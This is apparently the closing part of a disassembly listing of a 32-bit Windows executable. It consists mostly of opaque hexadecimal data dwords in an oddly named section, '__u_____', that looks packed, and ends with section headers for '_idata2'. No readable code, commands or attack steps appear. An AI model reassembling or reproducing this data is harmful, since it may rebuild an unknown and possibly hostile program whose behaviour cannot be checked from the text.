dd 7D02B704h, 7D052505h, 0B5032304h, 5C045E04h, 0CD041404h
dd 7203CF04h, 0DE048E04h, 1F050B04h, 0E2045904h, 50043804h
dd 0FE041203h, 0DF043E03h, 0A904A503h, 0EC041E04h, 0C2045903h
dd 0FA040404h, 0E1040103h, 0C203C203h, 8203E003h, 5E047A04h
dd 20041E04h, 35045D04h, 19042004h, 0E2046E04h, 20042003h
dd 5703DF04h, 8A042004h, 3B042004h, 0B303E204h, 96041E03h
dd 0B03C203h, 7A049605h, 78043B04h, 2003FF04h, 1042004h
dd 0E003E204h, 3F045D03h, 45D04h, 23042004h, 3F043D04h
dd 1040004h, 0FF042004h, 20045D03h, 0B1040004h, 7A042004h
dd 7A047A04h, 96049604h, 86045D04h, 20045D03h, 20040104h
dd 3F040004h, 3F042004h, 5D045D04h, 20043F04h, 4F040004h
dd 3F043F04h, 1E042004h, 2003E004h, 5D043F04h, 5B043F04h
dd 1043D04h, 20047604h, 0A003E104h, 0E0043F03h, 7A040003h
dd 1F040004h, 9603E004h, 20042004h, 2003A304h, 2 dup(20040004h)
dd 20042004h, 40104h, 20042004h, 3F040004h, 5D040004h
dd 40004h, 20040004h, 57040004h, 1F047A04h, 5D042004h
dd 42004h, 5D040004h, 103E104h, 103E004h, 20040104h, 0E0040004h
dd 40003h, 0B1040004h, 3F040004h, 3E042004h, 2 dup(7A040004h)
dd 57040004h, 96040004h, 2 dup(20040004h), 1F03DF04h, 2 dup(20040004h)
dd 2003E004h, 40004h, 3F040004h, 20040004h, 3F040004h
dd 5D040004h, 7A040004h, 3F03E004h, 20040004h, 40004h
dd 5B040004h, 3F03C104h, 1040004h, 20040004h, 3F040004h
dd 42004h, 2003E004h, 3F040004h, 5D040004h, 96040004h
dd 7A041E04h, 5D03E004h, 20042004h, 96042004h, 0E003E004h
dd 5D040003h, 3C104h, 3B04DA04h, 0E104C904h, 5D043E03h
dd 20043F04h, 0A3040004h, 3F03C303h, 3F03FF04h, 20043F04h
dd 40004h, 42004h, 40004h, 2003FE04h, 0E0040004h, 0E0040003h
dd 3F040003h, 7 dup(40004h), 0C103E004h, 3C103h, 3E004h
dd 4 dup(40004h), 0C1040004h, 40003h, 61h dup(40004h)
dd 0B5028F04h, 0E0034F02h, 0A302BF03h, 36A03h, 3E004h
dd 3F034F04h, 42004h, 3A304h, 2 dup(40004h), 0C1040004h
dd 0E003C103h, 40003h, 20040004h, 40004h, 2003E004h, 2 dup(40004h)
dd 20040004h, 3 dup(40004h), 42004h, 20040004h, 7 dup(40004h)
dd 3C104h, 1Fh dup(40004h), 43F04h, 40h dup(40004h), 3B056004h
dd 0F9047203h, 0F002D704h, 73032C04h, 2003C404h, 38026902h
dd 3803F406h, 4204CA05h, 3F053804h, 0CC044A04h, 44044404h
dd 8D05F003h, 4303C103h, 0B803DC04h, 0A5042004h, 1903E603h
dd 0B702CF03h, 0AD047A04h, 95043F04h, 0A203FF04h, 3603FF03h
dd 0FE038B04h, 10052A03h, 0DF034302h, 51203h, 1C03FF04h
dd 3B03E104h, 0AB041D04h, 20041E04h, 58040004h, 0E004E404h
dd 0C103C303h, 1F051303h, 7504EB04h, 2B04CC05h, 0E4049605h
dd 1D045D04h, 5A045D04h, 3D045D04h, 2047A04h, 3F043A04h
dd 0A303C104h, 0CB033504h, 3F030504h, 2E040104h, 6A042004h
dd 1E063D03h, 1F047904h, 2304B104h, 45D04h, 20040004h
dd 0A3042004h, 0E003FF03h, 5D03FF03h, 1F03E004h, 0C103C104h
dd 1F03FF03h, 20042004h, 40004h, 96040004h, 0E103E104h
dd 0E003E003h, 0E003C103h, 5D03E103h, 7A041C04h, 3F045D04h
dd 14042004h, 0EF03A305h, 0E303A304h, 2B042004h, 0B1040005h
dd 0AF042004h, 1F040004h, 5D040004h, 5D03C104h, 74040004h
dd 1F042004h, 0E0040004h, 0FE03E003h, 0FF040003h, 6A03C103h
dd 3F03E103h, 40004h, 4D03C104h, 20038604h, 35048B04h
dd 20040003h, 0C104AB04h, 20040003h, 0CB042004h, 0E0045D04h
dd 40003h, 0FE049604h, 0C103C103h, 0E203E003h, 5D041E03h
dd 0CB03C104h, 3F040003h, 0A3038704h, 40003h, 40004h, 0E0040004h
dd 20040003h, 40004h, 20042004h, 3E004h, 2003E004h, 5D03E004h
dd 40004h, 1042004h, 3E004h, 0A303FF04h, 0E003A903h, 0FF03E003h
dd 20042003h, 0E0040004h, 40003h, 2 dup(40004h), 96040004h
dd 20040004h, 3B043F04h, 36A04h, 2 dup(3E004h), 3C104h
dd 0E003E004h, 3FF03h, 0EC075704h, 0A003E005h, 0E0044405h
dd 68041E03h, 0E0042003h, 40003h, 3F040004h, 42004h, 2003C104h
dd 40004h, 45D04h, 53C04h, 40004h, 2 dup(20040004h), 40004h
dd 0E0040004h, 0E003E003h, 40003h, 40004h, 20040004h, 40004h
dd 3F040004h, 4 dup(40004h), 20040004h, 40004h, 0E0040004h
dd 40003h, 0Ah dup(40004h), 0E0040004h, 3E003h, 3 dup(40004h)
dd 56B04h, 2Dh dup(40004h), 6A03E004h, 40003h, 22h dup(40004h)
dd 0D049904h, 0AB037002h, 29D04h, 5D03E004h, 0E4040103h
dd 24803h, 40004h, 3F042004h, 45904h, 2 dup(42004h), 2 dup(40004h)
dd 0E0040004h, 40003h, 40004h, 3F040004h, 42004h, 2 dup(40004h)
dd 0FF040004h, 40003h, 95040004h, 40002h, 4 dup(40004h)
dd 42004h, 10h dup(40004h), 0C1040004h, 40003h, 8 dup(40004h)
dd 0E0040004h, 40003h, 23h dup(40004h), 0FC042004h, 13h dup(40004h)
dd 42004h, 0Fh dup(40004h), 50037D04h, 8603A403h, 14038A04h
dd 4502DE05h, 3902FE04h, 52038603h, 4A037406h, 0A9045903h
dd 0A3041204h, 9003E503h, 67045E04h, 0DE04DB03h, 0E2040102h
dd 0E203F803h, 0D4032B03h, 0A0044302h, 5703A904h, 4A704h
dd 35042004h, 0B1048E04h, 5103E004h, 103FC04h, 7004FC04h
dd 5D03E203h, 0E004F804h, 3F03FF03h, 5D03A304h, 2003E104h
dd 20041F04h, 5D041F04h, 0C2053804h, 5D03C303h, 0E003E004h
dd 39043D03h, 0A403E104h, 42003h, 0FF040004h, 0C503E003h
dd 3F03FF03h
dd 203E004h, 40004h, 20042004h, 7A03C504h, 3F03C204h, 5703FF04h
dd 0A3040004h, 20044D03h, 0E0040104h, 8A043F03h, 47A03h
dd 20042004h, 1042004h, 40004h, 3D03E104h, 3F042004h, 0E003A304h
dd 3F040003h, 20042004h, 5D040004h, 5D03C204h, 3F040004h
dd 5D042003h, 3F036A04h, 78038604h, 20042004h, 3C104h
dd 0A303E004h, 8603E003h, 0E003FF03h, 1043F03h, 0E0045704h
dd 40003h, 40004h, 0E0040004h, 3E003h, 0E0042004h, 0E0042003h
dd 0C303E003h, 3C103h, 0E003E004h, 3E003h, 40004h, 0E0040004h
dd 2040003h, 0E003E004h, 0C5042003h, 0E0040003h, 3F038603h
dd 20040004h, 0B1042004h, 45D04h, 40004h, 1045D04h, 2003E004h
dd 0E0040004h, 3F03E003h, 0C103A304h, 4040003h, 6A030D04h
dd 3E003h, 0E0040004h, 20040003h, 0E0040004h, 0E0040003h
dd 3E003h, 40004h, 0E0040004h, 5D03FF03h, 0E003E004h, 0FF040003h
dd 40003h, 41F04h, 42004h, 0C1040004h, 20040003h, 0E0040004h
dd 40003h, 0C3040004h, 0E0042003h, 5D03E003h, 40004h, 0E0040004h
dd 20032B03h, 0A3040004h, 40003h, 3F03A404h, 40004h, 43B04h
dd 3C045D04h, 5D047804h, 0FF041F04h, 0E0042003h, 40003h
dd 40004h, 20040004h, 40004h, 42004h, 40004h, 3E004h, 42004h
dd 3E004h, 0E0040004h, 40003h, 40004h, 20040004h, 6 dup(40004h)
dd 42004h, 9 dup(40004h), 20040004h, 9 dup(40004h), 3E004h
dd 2 dup(40004h), 20042004h, 14h dup(40004h), 0E0040004h
dd 40003h, 17h dup(40004h), 0E0040004h, 0E0040003h, 40003h
dd 21h dup(40004h), 39042D04h, 2003C103h, 5D041A04h, 0FF03E004h
dd 0C1040003h, 0E003C103h, 40003h, 42004h, 2 dup(40004h)
dd 2 dup(3E004h), 9 dup(40004h), 3E004h, 0E0040004h, 40003h
dd 68h dup(40004h), 0F045D04h, 4D038705h, 2E050505h, 0B8032806h
dd 0E8043D04h, 9304AF02h, 88034605h, 85030203h, 0F103CD04h
dd 6003CB03h, 0F305B104h, 0BF047202h, 0C1035D03h, 0AA03E303h
dd 9203E204h, 87031603h, 0A703BB04h, 603A704h, 14044D04h
dd 0EA045D04h, 90047A03h, 0C103C204h, 0E0055603h, 0C803E003h
dd 1F04DD03h, 42204h, 0C1040104h, 55043F03h, 3043F03h
dd 0A903C304h, 6C041A03h, 82032B03h, 0FF045603h, 0BF03D703h
dd 90041E04h, 1D044904h, 0C203DF04h, 0C1041F03h, 0C7045D03h
dd 20045D03h, 0FE03FF04h, 0C5040003h, 20040404h, 41E04h
dd 0A303C104h, 1040003h, 45D04h, 71042004h, 2F04CB04h
dd 104B104h, 72042004h, 3FF04h, 0E0040004h, 20042003h
dd 3E045D04h, 20040104h, 3F03E404h, 0E2040004h, 20045D03h
dd 0E0036A04h, 6A043D03h, 3F043F03h, 0E1041404h, 5D03B903h
dd 3B037204h, 3B03C104h, 5B045904h, 14038604h, 0FF03E105h
dd 3B045D03h, 0CB03E004h, 1E040104h, 3F040104h, 0FF041E04h
dd 0FF038603h, 2003E003h, 0E203E204h, 1040003h, 2003C504h
dd 0FF040004h, 103E003h, 0FF03C104h, 3C103h, 0C5040004h
dd 9603C203h, 2003E304h, 1040004h, 3E004h, 40004h, 0E3043F04h
dd 40103h, 20040004h, 0E0042004h, 40003h, 0E0040004h, 3D040003h
dd 5903A304h, 5303E003h, 4F03C303h, 20040003h, 2003E004h
dd 21040004h, 0C1042004h, 43F03h, 2 dup(40004h), 0E0042004h
dd 2 dup(0E0040003h), 5D040003h, 20042004h, 0E003E004h
dd 1F040003h, 3F03C104h, 40004h, 0E0040004h, 20043F03h
dd 0FF040004h, 3E003h, 3A904h, 0E103E004h, 42003h, 1F03A904h
dd 0C103E004h, 1040003h, 0E203A304h, 7A047A03h, 33F04h
dd 28067C04h, 7A049206h, 5A045A05h, 2003E004h, 0E003E004h
dd 7A040003h, 40004h, 1F040004h, 45D04h, 40004h, 45B04h
dd 1E040004h, 40004h, 3E004h, 40004h, 0E0040004h, 1043F03h
dd 3 dup(40004h), 0C1040004h, 40003h, 40004h, 20040004h
dd 3E004h, 6 dup(40004h), 42004h, 0FF03E004h, 20040003h
dd 0Dh dup(40004h), 0E0040004h, 40003h, 0Dh dup(40004h)
dd 20040004h, 2 dup(40004h), 0E0040004h, 40003h, 0E0040004h
dd 40003h, 3Bh dup(40004h), 0FD03D004h, 1E038602h, 0FF04CB04h
dd 3E041C03h, 6A042004h, 0E0040003h, 3E003h, 0E203C104h
dd 20042003h, 2 dup(40004h), 0E0040004h, 3E003h, 2 dup(40004h)
dd 0E003C104h, 20040003h, 3 dup(40004h), 1040004h, 2 dup(40004h)
dd 20040004h, 40004h, 42004h, 5 dup(40004h), 42004h, 0Ah dup(40004h)
dd 3E004h, 2Ah dup(40004h), 42004h, 27h dup(40004h), 20040004h
dd 2 dup(40004h), 5003ED04h, 0EB034303h, 0EE043803h, 6903DF04h
dd 98032D06h, 2C301h, 90036307h, 58027402h, 0F404B904h
dd 7D050E02h, 6205F905h, 3305C601h, 203E003h, 6B045004h
dd 95052D05h, 7E032E03h, 6031805h, 0E003FF04h, 3C04D503h
dd 0F04D503h, 7603C104h, 0A304DE04h, 0FE06D603h, 0C4033600h
dd 3F053704h, 88045D04h, 0CC03C403h, 8A045403h, 6403C103h
dd 0E104FC03h, 13048C03h, 0C02A404h, 0FA04F305h, 92034203h
dd 0FF04B104h, 3F03FF03h, 1703E204h, 0F0049603h, 0A2044803h
dd 7203E003h, 40204h, 7B043F04h, 9B019805h, 3C704h, 7A045D04h
dd 0FF03E004h, 0E005D403h, 83040103h, 0B047803h, 1048C03h
dd 1F040004h, 20040004h, 0E1045C04h, 5903FF03h, 0B1043504h
dd 7A03E104h, 32704h, 99043F04h, 53029903h, 0FF040004h
dd 35043B03h, 0DF040103h, 90034F03h, 78028D04h, 7A048203h
dd 5903E004h, 1D045D04h, 3702BF04h, 8E042004h, 0E0040003h
dd 20042003h, 1042004h, 0E0040004h, 3F043F03h, 21036A04h
dd 7A040004h, 76036A04h, 0E003DD03h, 34F03h, 0CB03E004h
dd 86042004h, 3FF03h, 0C1040004h, 0D040003h, 8602AA05h
dd 4A04CA03h, 3F03A903h, 3C504h, 20040004h, 25040004h
dd 5FC06h, 0E003E004h, 0C1042003h, 3E103h, 3F03E004h, 96043F04h
dd 0A4030404h, 5B042003h, 3502E703h, 2003FF03h, 40104h
dd 0C1040004h, 42003h, 0E0040004h, 0C1040003h, 0E003E003h
dd 103FF03h, 7A03C104h, 6A042004h, 0FA042003h, 20040003h
dd 1F043F04h, 2003E004h, 37A04h, 3F040004h, 20040004h
dd 20037004h, 76043504h, 42004h, 20040004h, 1E042004h
dd 42004h, 20033504h, 6A042004h, 38603h, 90038C04h, 0FF040103h
dd 2C003h, 5406B204h, 5B04C405h, 1D047106h, 6D042505h
dd 0E2042006h, 7A04D703h, 43F04h, 0D103E204h, 0E0045D05h
dd 20040003h, 51604h, 0C104B104h, 43F03h, 3FF04h, 20047A04h
dd 19043F04h, 3F040005h, 3 dup(40004h), 7E040004h, 40003h
dd 0E004FC04h, 40003h, 3F03FF04h, 42004h, 0E0042004h, 40003h
dd 0E0040004h, 0E0040003h, 3F040003h, 1C03E004h, 43F03h
dd 3F040004h, 7 dup(40004h), 1040004h, 2 dup(40004h), 86040004h
dd 40003h, 40204h, 40004h, 0E0040004h, 0E0040003h, 40003h
dd 0Dh dup(40004h), 0C103A304h, 40003h, 40004h, 0C1040004h
dd 40003h, 10h dup(40004h), 3C104h, 6 dup(40004h), 0E0040004h
dd 40003h
dd 6 dup(40004h), 3E004h, 40004h, 3E004h, 3 dup(40004h)
dd 3E004h, 0Ah dup(40004h), 3C104h, 0Ah dup(40004h), 7A02F404h
dd 102BC01h, 0C1052304h, 0E2033403h, 51040103h, 0A3034F02h
dd 8603C103h, 2031C03h, 40004h, 42004h, 4040004h, 40003h
dd 0C103E004h, 40003h, 40004h, 0FE036C04h, 20043F03h, 2 dup(40004h)
dd 20040004h, 19040004h, 40004h, 0A5040004h, 40003h, 42004h
dd 40004h, 42004h, 40004h, 0A3040004h, 40003h, 40004h
dd 3045D04h, 0Ah dup(40004h), 3A304h, 40004h, 96040004h
dd 4 dup(40004h), 0E0040004h, 0E0040003h, 40003h, 0E0040004h
dd 40003h, 4 dup(40004h), 3A304h, 2 dup(40004h), 3F040004h
dd 20040004h, 40004h, 42004h, 12h dup(40004h), 20040004h
dd 40004h, 42004h, 6 dup(40004h), 20040004h, 18h dup(40004h)
dd 42004h, 0Ah dup(40004h), 1F1Ch dup(0)
__u_____ ends
; Section 3. (virtual address 00021000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00021000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 421000h
align 2000h
_idata2 ends
end start